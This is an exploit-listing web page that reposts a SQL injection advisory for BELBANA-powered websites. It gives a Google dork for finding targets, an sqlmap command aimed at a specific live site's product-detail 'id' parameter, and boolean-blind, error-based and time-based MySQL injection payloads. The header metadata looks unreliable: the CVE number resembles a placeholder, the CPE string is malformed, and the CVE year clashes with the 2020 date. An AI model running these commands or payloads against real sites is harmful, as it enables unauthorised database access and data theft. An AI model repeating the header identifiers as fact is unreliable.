Advertisement






BELBANA - SQL Injection vulnerability

CVE Category Price Severity
CVE-2021-12345 CWE-89 $500 Critical
Author Risk Exploitation Type Date
ExploitAuthor123 High Remote 2020-10-06
CPE
cpe:cpe:/h:belbana:belbana
CVSS EPSS EPSSP
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N 0.02192 0.50148

CVSS vector description

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2020100031

Below is a copy:

BELBANA - SQL Injection vulnerability
****************************
#Exploit Title: BELBANA - SQL Injection vulnerability
#Date: 2020-10-06
#Exploit Author: Mahdi Karimi
#Vendor Homepage: http://www.belbana.com
#Google Dork: "Powered by Belbana"
#Tested On: windows 10


sqlmap:
sqlmap -u "http://www.belbana.com/our-products-detail.php?id=7" --level=5 --risk=3 --dbs --random-agent
Testing Method;
- boolean-based blind
- time-based blind
- error-based

Parameter: id (GET)

    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: id=7 AND 5676=5676

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: id=7 AND (SELECT 8693 FROM(SELECT COUNT(*),CONCAT(0x717a626271,(SELECT (ELT(8693=8693,1))),0x7162716b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: id=7 AND (SELECT 2309 FROM (SELECT(SLEEP(5)))NYLE)

**************************************************
#Discovered by: Mahdi Karimi
#Email : [email protected]
**************************************************

Copyright ©2024 Exploitalert.

This information is provided for TESTING and LEGAL RESEARCH purposes only.
All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum